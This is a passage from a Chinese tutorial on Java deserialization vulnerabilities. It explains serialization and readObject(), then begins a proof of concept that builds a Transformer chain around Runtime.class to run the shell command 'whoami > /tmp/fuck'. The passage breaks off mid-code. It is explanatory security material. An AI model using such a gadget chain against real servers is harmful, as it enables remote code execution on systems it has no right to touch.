Java反序列化漏洞详解
Java 反序列化 漏洞 从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java 反序列化 的 漏洞 简述后,并对于Java 反序列化 的Poc进行详细解读。 Java反序列化漏洞简介 Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列化。 Java 反序列化 即逆过程,由字节流还原成对象。ObjectInputStream类的readObject()方法用于 反序列化 。 因此要利用Java 反序列化 漏洞 ,需要在 进行 反序列化 的地方 传入 攻击者的序列化代码 。能符合以上条件的地方即存在 漏洞 。 Java反序列化Poc详解 public class test {public static void main(String[] args) throws Exception {String[] execArgs = new String[] { "sh", "-c", "whoami > /tmp/fuck" };Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new